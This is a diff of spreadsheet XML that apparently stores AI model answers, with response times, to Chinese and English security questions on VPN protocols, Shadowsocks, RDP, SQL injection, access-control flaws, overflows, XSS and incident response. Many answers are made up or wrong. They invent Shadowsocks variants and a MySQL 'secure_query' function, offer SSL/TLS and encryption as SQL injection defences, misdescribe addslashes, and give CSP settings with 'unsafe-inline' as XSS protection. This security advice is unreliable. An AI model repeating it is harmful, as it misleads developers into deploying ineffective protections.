+总之，HTTPS可以保护用户隐私和数据安全，并且提供一个安全的网络通信环境。</t>
         </is>
       </c>
       <c r="D114" t="n">
-        <v>14.03022599220276</v>
+        <v>10.64702773094177</v>
       </c>
     </row>
     <row r="115">
@@ -3900,19 +3939,20 @@
       </c>
       <c r="C115" t="inlineStr">
         <is>
-          <t>？
-VPN（虚拟专用网络）是一种技术，允许用户在互联网上进行安全和透明的通信。以下是常见的VPN协议：
-1. OpenVPN：OpenVPN 是一个开源的 VPN 协议，具有较高的安全性和可靠性。它使用 SSL/TLS 协议进行加密和证明，并可以在多种操作系统上使用。
-2. L2TP/IPSec：L2TP/IPSec 是一种基于Layer 2（传输层）的VPN协议，它使用的是加密和证明的IPSec协议。L2TP/IPSec 具有高度的安全性和可靠性，但需要更多的配置和管理。
-3. PPTP：Point-to-Point Tunneling Protocol（点对点隧道协议）是一种远程访问VPN协议，它使用的是MPPE（Multiprotocol Password Encryption）协议进行加密。PPTP 具有较低的配置和管理复杂度，但安全性较低。
-4. IKEv2：Internet Key Exchange version 2（互联网键exchange2）是一种安全的VPN协议，它使用的是可靠的symmetric encryption和非对称加密。IKEv2 具有较高的安全性和可靠性，但需要更多的配置和管理。
-5. SSH（Secure Shell）：SSH 是一种安全的Remote Access协议，它可以在多种操作系统上使用，但不是一种专门的VPN协议。SSH 具有较高的安全性和可靠性，但需要更多的配置和管理。
-6. SSL/TLS：Secure Sockets Layer/Transport Layer Security（安全сокет层/传输层安全）是一种安全的协议，它可以在多种操作系统上使用，但不是一种专门的VPN协议。SSL/TLS 具有较高的安全性和可靠性，但需要更多的配置和管理。
-这些协议都有各自的优缺点和应用场景， selects the most appropriate VPN protocol for your needs.&lt;/s&gt;</t>
+          <t>VPN（虚拟专用网络）是一种技术，允许用户通过互联网连接到一个虚拟网络，从而保护他们的私隐和安全。VPN协议是指在VPN连接中使用的协议或标准。以下是常见的VPN协议：
+1. OpenVPN：OpenVPN是一种开源的VPN协议，它使用TCP/UDP协议和AES加密方式来保护数据。OpenVPN支持多种端口和协议，可以在多种设备和操作系统上运行。
+2. PPTP（Point-to-Point Tunneling Protocol）：PPTP是一种常见的VPN协议，它使用GRE协议和MPPE加密方式来保护数据。PPTP支持多种端口和协议，可以在多种设备和操作系统上运行。
+3. L2TP/IPSec：L2TP/IPSec是一种VPN协议，它使用L2TP协议和IPSec加密方式来保护数据。L2TP/IPSec支持多种端口和协议，可以在多种设备和操作系统上运行。
+4. IKEv2（Internet Key Exchange, version 2）：IKEv2是一种VPN协议，它使用Symmetric key encryption和Asymmetric key encryption来保护数据。IKEv2支持多种端口和协议，可以在多种设备和操作系统上运行。
+5. SSH（Secure Shell）：SSH是一种Secure Sockets Layer协议，它使用 symmetric key encryption和public key encryption来保护数据。SSH支持多种端口和协议，可以在多种设备和操作系统上运行。
+6. SSL/TLS（Secure Sockets Layer/Transport Layer Security）：SSL/TLS是一种加密协议，它使用 symmetric key encryption和public key encryption来保护数据。SSL/TLS支持多种端口和协议，可以在多种设备和操作系统上运行。
+7. WireGuard：WireGuard是一种轻量级的VPN协议，它使用stateful cryptography和fast handshake来保护数据。WireGuard支持多种端口和协议，可以在多种设备和操作系统上运行。
+8. SoftEther VPN：SoftEther VPN是一种高速VPN协议，它使用Stealth encapsulation和VPN Acceleration来保护数据。SoftEther VPN支持多种端口和协议，可以在多种设备和操作系统上运行。
+这些VPN协议都有其优缺点和应用场景，选择合适的VPN协议取决于你的需求和环境。</t>
         </is>
       </c>
       <c r="D115" t="n">
-        <v>19.23310112953186</v>
+        <v>24.14482736587524</v>
       </c>
     </row>
     <row r="116">
@@ -3926,23 +3966,19 @@
       </c>
       <c r="C116" t="inlineStr">
         <is>
-          <t>？
-Shadowsocks是一个开源的跨平台、安全的VPN工具，可以在多种操作系统上使用，包括Linux、Mac OS、Windows等。它的主要特点是具有以下几个优点：
-1. 安全性：Shadowsocks使用安全的 encryption algorithm，可以减少攻击者的阻挡和监听。
-2. 隐蔽性：Shadowsocks可以隐藏用户的网络活动，使其difficult to detect和 block。
-3. 多态性：Shadowsocks支持多种VPN protocols，可以根据不同的情况选择最适合的协议。
-4. 跨平台支持：Shadowsocks可以在多种操作系统上使用，包括Linux、Mac OS、Windows等。
-5. 开源：Shadowsocks是开源的，可以免费使用和修改。
-Shadowsocks的主要应用场景包括：
-1. 隐蔽网络活动：Shadowsocks可以隐藏用户的网络活动，保护用户的隐私和安全。
-2. 跨国连接：Shadowsocks可以跨国连接，帮助用户访问境外的网站和服务。
-3. 避免网络审查：Shadowsocks可以避免国家的网络审查和监控。
-4. 安全上网：Shadowsocks可以提供一个安全的网络连接，防止恶意软件和攻击者攻击用户的计算机。
-总之，Shadowsocks是一个安全、隐蔽、多态的VPN工具，可以帮助用户隐藏网络活动，保护隐私和安全，并且可以在多种操作系统上使用。&lt;/s&gt;</t>
+          <t>Shadowsocks是一个开源的跨平台、协议和技术的跨网络安全解决方案，它通过使用加密、混合、跨域、跨端和跨网络等技术来保护用户的隐私和安全。Shadowsocks的核心技术包括Shadowsocks-R虚拟网络通信协议、Shadowsocks-X虚拟网络协议、Shadowsocks-C虚拟网络协议等，这些协议可以将用户的网络流量 encrypt、匿名化和跨网络传输。
+Shadowsocks的主要特点包括：
+1. 跨平台支持：Shadowsocks可以在多种操作系统和设备上进行安装和使用，包括Windows、Mac、Linux、Android等。
+2. 跨网络支持：Shadowsocks可以在多种网络环境中进行使用，包括互联网、内网、虚拟专用网络等。
+3. 加密技术：Shadowsocks使用的加密算法包括AES-256、ChaCha20等，可以为用户的数据带来高度的安全保障。
+4. 混合技术：Shadowsocks可以通过使用多种技术来实现匿名和隐蔽，包括VPN、SOCKS、Tor等。
+5. 跨域技术：Shadowsocks可以使用多种跨域技术来实现跨域传输，包括Shadowsocks-R、Shadowsocks-X、Shadowsocks-C等。
+6. 可扩展性：Shadowsocks可以根据需要进行扩展和拓展，可以将其与其他软件或技术集成。
+总之，Shadowsocks是一个功能强大、可靠的跨平台、跨网络安全解决方案，可以帮助用户在多种网络环境中保护自己的隐私和安全。</t>
         </is>
       </c>
       <c r="D116" t="n">
-        <v>15.33157229423523</v>
+        <v>18.06136584281921</v>
       </c>
     </row>
     <row r="117">
@@ -3956,22 +3992,22 @@
       </c>
       <c r="C117" t="inlineStr">
         <is>
-          <t>？ 
-RDP stands for Remote Desktop Protocol. It is a communication protocol that allows users to remotely access and control another computer over a network connection. RDP is commonly used to remotely access and control a computer running the Windows operating system, but it can also be used to access and control other types of computers and devices.
-RDP is a widely used protocol, and it is supported by many different operating systems and platforms, including Windows, macOS, Linux, and mobile devices. RDP allows users to connect to a remote computer using a variety of clients, including the built-in Remote Desktop client in Windows, third-party clients like TeamViewer or LogMeIn, or even mobile apps like Remote Desktop for iOS or Android.
-Once a user has connected to a remote computer using RDP, they can use the remote desktop to interact with the computer's desktop and applications as if they were sitting in front of it. This allows users to access and control the remote computer's files, applications, and hardware remotely, which can be useful for a variety of purposes, such as working remotely, providing technical support, or accessing a computer for maintenance or troubleshooting.
-RDP is a powerful and versatile protocol that offers many features and benefits, including:
-* Remote access to a computer's desktop and applications
-* Full keyboard and mouse control over the remote computer
-* Ability to transfer files and data between the remote and local computers
-* Support for multiple monitors and resolutions
-* Encryption and security features to protect the remote connection
-* Integration with other Microsoft technologies, such as Active Directory and Azure
-Overall, RDP is an important protocol that enables users to remotely access and control computers over a network connection, making it a valuable tool for a wide range of applications and use cases.&lt;/s&gt;</t>
+          <t>RDP（Remote Desktop Protocol）是一种协议，允许用户远程访问和控制另一个计算机。它通常用于远程工作、支持和管理等场景。RDP使用 TCP 协议来传输数据，并使用 SSL/TLS 协议来加密数据。RDP可以在多种操作系统上使用，包括 Windows、Linux、Mac 等。
+RDP 协议的主要特点包括：
+1. 安全性：RDP 使用 SSL/TLS 协议来加密数据，保护远程连接免受攻击。
+2. 高效性：RDP 可以使用多个帧重复机制来提高帧的传输速度。
+3. 灵活性：RDP 可以在多种操作系统上使用，并且可以在不同的环境中进行远程连接。
+4. 可扩展性：RDP 可以通过使用第三方扩展程序来提高其功能。
+RDP 协议的使用场景包括：
+1. 远程工作：RDP 可以帮助用户远程访问和控制另一个计算机，以实现远程工作。
+2. 支持和管理：RDP 可以帮助 IT 人员远程支持和管理多个计算机，以提高生产力和效率。
+3. 教育和训练：RDP 可以帮助教育机构远程教学和训练学生，以提高学生的学习效果。
+4. 医疗保健：RDP 可以帮助医疗机构远程提供医疗服务，以提高患者的服务质量。
+总之，RDP 协议是一种具有安全性、高效性、灵活性和可扩展性的远程连接协议，广泛应用于远程工作、支持和管理、教育和训练、医疗保健等领域。</t>
         </is>
       </c>
       <c r="D117" t="n">
-        <v>10.22894668579102</v>
+        <v>17.44220185279846</v>
       </c>
     </row>
     <row r="118">
@@ -3985,23 +4021,22 @@
       </c>
       <c r="C118" t="inlineStr">
         <is>
-          <t>？
-SQL注入是一种常见的web应用程序漏洞，它可以让攻击者在web应用程序中执行任意的SQL语句，从而导致数据丢失、安全漏洞和威胁。以下是一些有效的方法来避免SQL注入漏洞在开发中：
-1. 使用 Parameterized Query：使用Parameterized Query可以避免 directly injecting user input into the SQL query. By using parameterized queries, you can bind the user input to a parameter, which will be passed to the database as a parameter, rather than being incorporated directly into the SQL query.
-2. 使用Prepared Statements：Prepared statements are a type of stored procedure that can be used to execute a SQL query. By using prepared statements, you can avoid SQL injection by providing a pre-defined SQL query, rather than constructing the query dynamically.
-3. 避免使用user input directly into SQL queries： avoid using user input directly into SQL queries. Instead, use parameterized queries or stored procedures to execute the SQL query.
-4. 使用WHEN clause：use the WHEN clause to validate user input before inserting it into the SQL query. This can help prevent SQL injection attacks by ensuring that only valid input is used in the query.
-5. 使用Limitations on input：limit the input that can be used in the SQL query. For example, you can limit the length of the input or the types of characters that can be used in the input.
-6. 使用Output escaping：use output escaping to escape any special characters in the output. This can help prevent SQL injection attacks by ensuring that any special characters in the output are properly escaped.
-7. 使用security frameworks：use security frameworks such as OWASP ESAPI or Spring Security to help protect against SQL injection attacks. These frameworks provide a range of features and tools to help protect against SQL injection and other security threats.
-8. 使用Automated testing：use automated testing to test your application for SQL injection vulnerabilities. This can help identify any vulnerabilities and allow you to fix them before they can be exploited by an attacker.
-9. 使用Web application firewalls：use web application firewalls (WAFs) to protect your application from SQL injection attacks. WAFs can help detect and prevent SQL injection attacks by filtering incoming traffic and blocking any suspicious activity.
-10. 使用Regular expression validation：use regular expression validation to validate user input before inserting it into the SQL query. This can help prevent SQL injection attacks by ensuring that only valid input is used in the query.
-By following these tips, you can help protect your web application from SQL injection attacks and ensure that your data remains secure.&lt;/s&gt;</t>
+          <t>在开发中， SQL 注入漏洞是一种常见的安全漏洞，它可以让攻击者通过输入特定的查詢语句来执行特定的操作，如查看、更改或删除数据。以下是一些避免 SQL 注入漏洞的方法：
+1. 使用 parameterized queries：使用 parameterized queries 可以避免直接嵌入 user input 到查詢语句中，从而避免 SQL 注入漏洞。 Parameterized queries 通过将用户输入存储在扩展名中，然后在查詢语句中使用这些值来替换特定的查詢语句。
+2. 使用 prepared statements：prepared statements 是一种类似于 parameterized queries 的方法，它们通常在数据库中使用。 prepared statements 将查詢语句存储在数据库中，然后在应用程序中使用这些语句来执行查詢。
+3. 使用 filters：filters 可以帮助避免 SQL 注入漏洞，通过对用户输入进行过滤和检查。 filters 可以在应用程序中使用，例如，在查詢语句中使用 LIKE 函数来过滤输入，或者在数据库中使用 SQL  Filter 来过滤数据。
+4. 使用 validation：validation 可以帮助避免 SQL 注入漏洞，通过对用户输入进行验证和检查。 validation 可以在应用程序中使用，例如，使用 PHP 的 filter_var 函数来验证用户输入是否符合要求，或者使用 Java 的 validate 方法来验证用户输入是否符合要求。
+5. 使用 encoding：encoding 可以帮助避免 SQL 注入漏洞，通过将用户输入编码为 Unicode 字符串。 encoding 可以在应用程序中使用，例如，使用 PHP 的 addslashes 函数来编码用户输入，或者使用 Java 的 URL Encoder 来编码用户输入。
+6. 避免使用Raw SQL：Raw SQL 可以帮助避免 SQL 注入漏洞，通过避免直接使用用户输入到查詢语句中。 Raw SQL 可以在应用程序中使用，例如，使用 PHP 的 query_builder 来创建查詢语句，然后使用这些语句来执行查詢。
+7. 使用 secure_query 函数：secure_query 函数可以帮助避免 SQL 注入漏洞，通过对查詢语句进行加密和验证。 secure_query 函数可以在数据库中使用，例如，使用 MySQL 的 secure_query 函数来加密查詢语句，或者使用 Oracle 的 secure_query 函数来加密查詢语句。
+8. 避免使用扩展名：扩展名可以帮助避免 SQL 注入漏洞，通过避免直接使用用户输入到查詢语句中。 扩展名可以在应用程序中使用，例如，使用 PHP 的 preg_replace 函数来替换扩展名，或者使用 Java 的 replace 方法来替换扩展名。
+9. 使用 two-way encryption：two-way encryption 可以帮助避免 SQL 注入漏洞，通过对用户输入进行加密和验证。 two-way encryption 可以在应用程序中使用，例如，使用 PHP 的 crypt 函数来加密用户输入，然后使用这些加密后的值来执行查詢。
+10. 避免使用老式 SSL/TLS：老式 SSL/TLS 可以帮助避免 SQL 注入漏洞，通过使用更高级别的加密方式来 encrypt 查詢语句。 old SSL/TLS 可以在应用程序中使用，例如，使用 PHP 的 openssl_encrypt 函数来加密查詢语句，或者使用 Java 的 SSL 或 TLS 类来加密查詢语句。
+总之，避免 SQL 注入漏洞需要总结一些方法和技术，包括使用 parameterized queries、prepared statements、filters、validation、encoding、Raw SQL、secure_query 函数、扩展名、two-way encryption 和 old SSL/TLS。</t>
         </is>
       </c>
       <c r="D118" t="n">
-        <v>16.79712128639221</v>
+        <v>35.8709888458252</v>
       </c>
     </row>
     <row r="119">
@@ -4015,23 +4050,20 @@
       </c>
       <c r="C119" t="inlineStr">
         <is>
-          <t>？
-在开发中，避免越权漏洞是非常重要的。越权漏洞是指在程序代码中，某个功能或数据被访问或修改了，导致程序运行时出现异常或泄露情况。以下是避免越权漏洞的一些建议：
-1. 使用权限管理：在开发中，使用权限管理是非常重要的。通过限制每个用户或角色的访问权限，可以避免越权漏洞。例如，只允许特定角色访问特定的数据或功能。
-2. 验证用户input：在开发中，需要对用户输入进行严格验证，避免越权漏洞。例如，不要直接使用用户输入来访问数据库或访问其他功能。
-3. 使用安全编程技术：使用安全编程技术，例如，使用SQL注入防御和 cross-site scripting（XSS）防御等。
-4. 采用Role-Based Access Control（RBAC）：RBAC是一种权限管理技术，可以让开发人员根据用户的角色来决定访问权限。
-5. 使用权限模型：使用权限模型，例如，使用ACL（访问控制列表）来管理权限。
-6. 避免使用hardcoded权限：避免在程序代码中使用硬编码的权限，因为这可能会导致越权漏洞。
-7. 使用权限检查：在程序运行时，使用权限检查来验证用户的权限，避免越权漏洞。
-8. 采用权限验证：采用权限验证，例如，使用权限验证模块来验证用户的权限。
-9. 避免使用default权限：避免在程序代码中使用默认权限，因为这可能会导致越权漏洞。
-10. 通过权限审核：通过权限审核来确保权限的有效性，避免越权漏洞。
-总之，避免越权漏洞需要在开发中严格遵循权限管理原则，使用安全编程技术和权限管理工具，并通过权限审核和权限验证来确保权限的有效性。&lt;/s&gt;</t>
+          <t>在开发中，越权漏洞（Grantless vulnerabilities）是指没有被授权的访问或操作可以让攻击者获得敏感数据或权力。这些漏洞可能会导致敏感数据泄露、安全受到攻击，因此在开发中应该采取适当的措施来避免越权漏洞。以下是一些避免越权漏洞的建议：
+1. 权限验证：在应用程序中，只授予最小的权限给用户，即使用户拥有某个功能或数据，也应该只授予他们对这些数据的访问权限，而不是授予他们所有的权限。
+2. 访问控制：限制访问权限，只允许某些用户或某些功能访问敏感数据或功能。例如，在一个购物网站上，只允许用户购买的数据，而不允许他们访问其他用户的资料。
+3. 权限隔离：将敏感数据分隔离在不同的环境中，例如在一个独立的数据库或服务中，以防止攻击者访问敏感数据。
+4. 权限划定：在应用程序中，划定权限，例如，只允许某些用户访问敏感数据，而不允许其他用户访问。
+5. 验证权限：在应用程序中，验证用户的权限，例如，在一个购物网站上，只允许注册用户购买产品，而不允许未注册用户购买。
+6. 权限管理：在应用程序中，定期检查和更新用户的权限，例如，在一个社交媒体平台上，只允许用户访问敏感数据，直到他们的权限更新为有权访问。
+7. 敏感数据安全：在应用程序中，将敏感数据存储在安全的数据存储中，例如，在一个加密的数据库中，以防止攻击者访问敏感数据。
+8. 安全检查：在应用程序中，定期检查和更新安全检查，例如，在一个网站上，定期检查用户的访问权限，以防止用户访问敏感数据。
+总之，避免越权漏洞需要通过不断地对应用程序的权限进行检查和更新，并在需要时增加防御方面的措施。</t>
         </is>
       </c>
       <c r="D119" t="n">
-        <v>22.82029390335083</v>
+        <v>25.13314199447632</v>
       </c>
     </row>
     <row r="120">
@@ -4045,21 +4077,22 @@
       </c>
       <c r="C120" t="inlineStr">
         <is>
-          <t>？
-在开发中，溢出漏洞是一种常见的安全漏洞，可能会导致数据泄露或者远程执行代码。以下是一些避免溢出漏洞的方法：
-1.  validation 和检查：在数据 Binding 时，务必对数据进行正确的 Validation 和检查。检查数据是否符合预期的格式和范围，并执行适当的操作，如抛出异常或终止循环，以防止数据泄露。
-2. 使用授权：在访问数据时，务必使用授权机制，如访问控制列表（ACL）或授权 Token。这样可以防止非法访问数据，从而避免溢出漏洞。
-3. 使用静态分配：在数据 Binding 时，使用静态分配的方式可以避免溢出漏洞。通过在数据 Binding 时使用静态分配的方式，可以确保数据的访问权限是稳定的，从而避免溢出漏洞。
-4. 使用排除机制：在数据 Binding 时，可以使用排除机制，如防火墙或者排除规则，来避免溢出漏洞。这样可以确保数据仅有合法的访问者可以访问。
-5. 使用拦截器：在数据 Binding 时，可以使用拦截器，如防火墙或者拦截器，来避免溢出漏洞。这样可以确保数据仅有合法的访问者可以访问。
-6. 使用最佳 Practice：在数据 Binding 时，务必遵守最佳 Practice，如验证数据的范围和格式，并遵循安全标准和建议。这样可以确保数据的安全性和可靠性。
-7. 使用针对的机制：在数据 Binding 时，可以使用针对的机制，如针对的数据库接口或者针对的分布式系统，来避免溢出漏洞。这样可以确保数据仅有合法的访问者可以访问。
-8. 使用安全框架：在数据 Binding 时，可以使用安全框架，如Spring Security 或者 OWASP，来避免溢出漏洞。这样可以确保数据的安全性和可靠性。
-总之，避免溢出漏洞需要在数据 Binding 时遵循最佳 Practice，使用适当的机制和措施，并在需要时使用安全框架和拦截器等工具。&lt;/s&gt;</t>
+          <t>在开发中，溢出漏洞是一种常见的安全漏洞，可能会导致数据泄露或程序崩溃。以下是一些有效的方法来避免溢出漏洞在开发中：
+1. 使用垃圾回收机制：垃圾回收机制可以帮助开发者避免溢出漏洞。垃圾回收机制可以在内存中自动释放不再引用的内存地址。
+2. 使用内存检查：内存检查可以帮助开发者检测溢出漏洞。可以在程序运行时检查内存中的块是否已经释放，并在发现溢出时中止程序的运行。
+3. 使用静态内存分析工具：静态内存分析工具可以帮助开发者检测溢出漏洞。这些工具可以在程序编译时检查内存中的块是否已经释放，并提供相应的警告。
+4. 避免在不可靠的地方使用动态分配的内存：动态分配的内存可能会导致溢出漏洞。因此，应该避免在不可靠的地方使用动态分配的内存。
+5. 使用内存安全框架：内存安全框架可以帮助开发者避免溢出漏洞。这些框架可以在程序运行时检查内存中的块是否已经释放，并提供相应的检测和处理机制。
+6. 使用静态分配的内存：静态分配的内存可以帮助避免溢出漏洞。这种方法可以在程序编译时静态分配内存，并在程序运行时强制释放它。
+7. 避免使用内存模拟：内存模拟可能会导致溢出漏洞。因此，应该避免在不可靠的地方使用内存模拟。
+8. 使用内存锁：内存锁可以帮助避免溢出漏洞。这种方法可以在程序运行时锁定内存块，以防止其被其他线程访问。
+9. 使用内存占用检测：内存占用检测可以帮助开发者检测溢出漏洞。这种方法可以在程序运行时检测内存中的块是否已经释放，并提供相应的警告。
+10. 避免在多线程环境中使用内存：多线程环境可能会导致溢出漏洞。因此，应该避免在多线程环境中使用内存。
+总之，避免溢出漏洞需要充分了解内存管理的基本原则和内存安全框架。开发者应该遵循以上方法，以免溢出漏洞导致程序崩溃或数据泄露。</t>
         </is>
       </c>
       <c r="D120" t="n">
-        <v>24.43250584602356</v>
+        <v>27.21307182312012</v>
       </c>
     </row>
     <row r="121">
@@ -4073,34 +4106,22 @@
       </c>
       <c r="C121" t="inlineStr">
         <is>
-          <t>？
-XSS（Cross-Site Scripting）是一种常见的攻击方式，通过填充敏感资料（例如， cookies、user agent）或通过使用JavaScript来访问Web应用程序的敏感数据。这可能会导致用户遭受安全隐患，例如，竊取用户凭据，或者在用户的屏幕上显示不当的内容。
-以下是一些避免XSS攻击的方法：
-1. 避免直接使用用户提供的数据
-在Web应用程序中，不要直接使用用户提供的数据，例如，cookie值或user agent。可以使用HTTP请求中的数据来替代这些数据。
-2. 使用HTMLSanitization
-HTMLSanitization是一种可以帮助避免XSS攻击的技术。它可以将用户提供的数据转换为安全的形式，以避免 direct injection of malicious code。
-3. 使用Content Security Policy
-Content Security Policy (CSP) 是一种可以帮助避免XSS攻击的技术。它可以声明允许的资源，从而避免访问非法资源。
-4. 使用Nonce
-Nonce是一种可以帮助避免XSS攻击的技术。它可以在Web应用程序中使用一个唯一的值，以防止重复访问。
-5. 避免使用JavaScript
-JavaScript可以用来访问Web应用程序的敏感数据，因此，可以避免使用JavaScript来处理敏感数据。
-6. 使用安全的数据交互机制
-可以使用安全的数据交互机制，例如，使用HTTPS，使用验证和签名等方式来保护数据的安全性。
-7. 避免使用敏感数据在URL中
-可以避免使用敏感数据在URL中，例如，不要使用cookie值或user agent在URL中。
-8. 避免使用敏感数据在数据请求中
-可以避免使用敏感数据在数据请求中，例如，不要在数据请求中包含敏感数据。
-9. 避免使用敏感数据在数据响应中
-可以避免使用敏感数据在数据响应中，例如，不要在数据响应中包含敏感数据。
-10. 避免使用敏感数据在Web应用程序中
-可以避免使用敏感数据在Web应用程序中，例如，不要在Web应用程序中使用敏感数据。
-总之，避免XSS攻击需要constant vigilance和常规的安全做法。具体实现方式可以根据具体情况进行定制。&lt;/s&gt;</t>
+          <t>XSS（Cross-Site Scripting）是一种常见的攻击方式，可以使您的网站或应用程序承诺着敏感数据。下面是一些避免XSS攻击的常见方法：
+1. 使用HTML Sanitizing：将用户提交的数据过滤掉可能包含XSS攻击的字符串。可以使用HTML Sanitizing库，例如PHP的filter_var()函数或者JavaScript的encodeURIComponent()函数。
+2. 防止脚本 executed：不允许脚本在您的网站上执行，避免脚本攻击。可以使用HTTP响应 headers中的Content-Security-Policy，例如："script-src 'self' 'unsafe-inline';"。
+3. 验证用户input：对用户提交的数据进行验证，避免接受可能包含XSS攻击的数据。例如，不允许用户输入特定标签或属性。
+4. 使用Content Security Policy（CSP）：使用CSP可以限制脚本和代码的执行，避免XSS攻击。例如，可以将CSP设置为："script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline';"。
+5. 使用Nonce：使用Nonce可以防止脚本攻击。例如，可以在URL中添加一个随机值，例如："?nonce=random_value"。
+6. 避免使用隐藏元素：不要使用隐藏元素，例如，隐藏的frameset或layers。
+7. 使用HTTPS：使用HTTPS可以防止XSS攻击，因为HTTPS可以使网站数据在transfer中加密。
+8. 避免使用受信任的域名：不要使用受信任的域名，例如，不要使用*.example.com。
+9. 避免使用扩展名：不要使用扩展名，例如，不要使用*.js。
+10. 避免使用脚本域名：不要使用脚本域名，例如，不要使用*.example.com/script.js。
+需要注意的是，避免XSS攻击并不是一个简单的任务，需要对整个网站或应用程序进行全面的安全检查。</t>
         </is>
       </c>
       <c r="D121" t="n">
-        <v>25.85814666748047</v>
+        <v>19.51575016975403</v>
       </c>
     </row>
     <row r="122">
@@ -4114,16 +4135,15 @@
       </c>
       <c r="C122" t="inlineStr">
         <is>
-          <t>？
-Network security risks are potential threats to the confidentiality, integrity, and availability of a network and its resources. The three key elements of network security risks are:
-1. Threats: These are the sources of potential danger to the network, such as hackers, malware, and unauthorized access. Threats can come from within or outside the organization and can be intentional or unintentional.
-2. Vulnerabilities: These are weaknesses or flaws in the network or its systems that can be exploited by threats to gain unauthorized access or cause damage. Vulnerabilities can be caused by outdated software, unpatched systems, or insufficient security measures.
-3. Assets: These are the valuable resources that are protected by the network security measures, such as sensitive data, intellectual property, and critical infrastructure. Assets can be compromised or disrupted by security breaches, leading to financial loss, reputational damage, or other negative consequences.
-By understanding and managing these three key elements of network security risks, organizations can minimize the likelihood and impact of security incidents and protect their assets from potential threats.&lt;/s&gt;</t>
+          <t>Network security risk three elements refer to the three primary factors that contribute to the likelihood and impact of security threats in a computer network. These elements are:
+1. Assets: The first element is assets, which refers to the valuable data, systems, and resources that are vulnerable to security threats. These assets can include sensitive information, intellectual property, financial data, and other critical assets that must be protected.
+2. Threats: The second element is threats, which refers to the various sources of security risks that can compromise the security of the network. These threats can come from internal or external sources, including malicious actors, hackers, viruses, worms, and other types of cyber threats.
+3. Vulnerabilities: The third element is vulnerabilities, which refers to the weaknesses or gaps in the network's security defenses that can be exploited by threats. Vulnerabilities can include outdated software, unpatched systems, insufficient security measures, and other weaknesses that can be leveraged by attackers.
+By understanding these three elements, organizations can better identify and manage their security risks, and take steps to protect their valuable assets from potential threats.</t>
         </is>
       </c>
       <c r="D122" t="n">
-        <v>6.716228723526001</v>
+        <v>6.84211540222168</v>
       </c>
     </row>
     <row r="123">
@@ -4137,19 +4157,21 @@
       </c>
       <c r="C123" t="inlineStr">
         <is>
-          <t>？
-网络安全风险评估的主要步骤包括：
-1. 明确网络安全风险的范围：确定网络系统和数据对公司和用户的潜在威胁，例如黑客攻击、恶意软件、数据泄露等。
-2. 评估网络安全风险的严重程度：评估网络风险的可能性和影响程度，例如风险的可能性、影响范围和潜在损失。
-3. 评估网络安全风险的源头：分析网络风险的来源，例如人为错误、技术缺陷、恶意攻击等。
-4. 评估网络安全风险的影响：评估网络风险对公司和用户的影响，例如数据泄露、网络干扰、系统崩溃等。
-5. 制定网络安全风险管理计划：根据评估结果，制定有效的网络安全风险管理计划，例如风险评估、风险评估、风险管理等。
-6. 实施网络安全风险管理措施：根据网络安全风险管理计划，实施有效的网络安全风险管理措施，例如安全软件、防火墙、安全策略等。
-7. 监测和更新：定期监测网络安全风险，更新网络安全风险评估和管理计划，以确保网络安全风险管理的有效性。&lt;/s&gt;</t>
+          <t>network security risk assessment is a crucial process that involves evaluating the potential threats and vulnerabilities in a computer network. The following are the main steps involved in a network security risk assessment:
+1. Identify Assets: The first step is to identify the assets that need to be protected, including hardware, software, data, and other network resources.
+2. Identify Threats: Next, identify potential threats to the network, including malware, hacking, unauthorized access, and other types of cyber threats.
+3. Assess Vulnerabilities: Evaluate the network's vulnerabilities to potential threats, including weak passwords, unpatched software, and inadequate security measures.
+4. Determine Risk Levels: Assign a risk level to each identified threat and vulnerability, based on factors such as the likelihood of an attack and the potential impact on the network.
+5. Develop a Risk Mitigation Plan: Based on the risk levels assigned, develop a plan to mitigate or eliminate the identified risks, including implementing security measures, training employees, and establishing incident response procedures.
+6. Continuously Monitor and Review: Continuously monitor and review the network's security posture to ensure that the risk mitigation plan is effective and to identify any new threats or vulnerabilities that need to be addressed.
+7. Prioritize and Focus: Prioritize the risks based on their potential impact and likelihood of occurrence, and focus on addressing the most critical risks first.
+8. Communicate and Collaborate: Communicate the results of the risk assessment to relevant stakeholders and collaborate with them to address the identified risks.
+9. Document and Update: Document the risk assessment findings and update them regularly to ensure that the risk assessment remains current and relevant.
+By following these steps, organizations can effectively assess and manage the risks associated with their computer networks, helping to ensure the confidentiality, integrity, and availability of their data and systems.</t>
         </is>
       </c>
       <c r="D123" t="n">
-        <v>16.96672296524048</v>
+        <v>11.49848198890686</v>
       </c>
     </row>
     <row r="124">
@@ -4163,20 +4185,19 @@
       </c>
       <c r="C124" t="inlineStr">
         <is>
-          <t>？
-应急响应是指在各种情况下，能够快速、有效地应对和扑眶问题的过程。以下是一般应急响应的流程：
-1. 报警：当一个事件或情况发生时，需要立即报警，通常是通过电话、短信、电子邮件等方式。
-2. 评估：响应者应该立即评估事件的严重性和影响，并确定需要执行哪些措施。
-3. 部署防御力：根据评估结果，响应者应该快速部署防御力，例如派遣人员、执行特殊任务、投入资源等。
-4. 评估情况：在防御力部署后，响应者应该 kontinuously 评估事件的情况，了解是否需要更多的措施，或者是否可以减少现有的措施。
-5. 撤离和恢复：在响应进行到一定程度后，响应者应该考虑撤离当地人员和资产，并恢复正常的社会秩序和经济活动。
-6. 复杂性管理：在某些情况下，应急响应可能会遇到复杂性，例如多个受影响方面、多个领导管理等。在这些情况下，响应者应该能够有效地管理复杂性，实现协同的响应。
-7. 后续评估：在响应完成后，响应者应该进行有效的评价和学习，了解是否有任何改进可以进行，以便在未来可以更好地应对类似情况。
-总之，应急响应的流程包括报警、评估、部署防御力、评估情况、撤离和恢复、复杂性管理和后续评估等步骤，响应者需要能够快速、有效地应对和扑眶问题，以确保社会秩序和经济活动的不断发展。&lt;/s&gt;</t>
+          <t>应急响应是指在紧急情况下，能够快速、有效地应对和处理的过程。应急响应流程通常包括以下几个步骤：
+1. 报警：在紧急情况出现时，发送紧急报警 signals，通常使用紧急报警按钮或者其他报警工具。
+2. 评估情况：在报警后，评估紧急情况的严重程度和影响 scope，确定应急响应级别和应急措施。
+3. 确定应急措施：根据评估结果，确定应急措施，包括警示、救援、防范、恢复等。
+4. 执行应急措施：按照计划进行应急措施，包括警示、救援、防范、恢复等。
+5. 评估结果：在应急情况过后，评估应急响应效果，检查是否有缺陷、潜在问题，并根据情况进行改进和优化。
+6. 救援和恢复：在紧急情况已经得到控制后，开始救援和恢复工作，包括救援人员、物资和设备等。
+7. 危机管理：在应急情况过后，评估和管理危机的影响，确定是否需要进行危机管理和回归工作。
+总之，应急响应流程是一个复杂的过程，需要系统性地优化和管理，以确保在紧急情况下能够快速、有效地应对和处理。</t>
         </is>
       </c>
       <c r="D124" t="n">
-        <v>20.32963681221008</v>
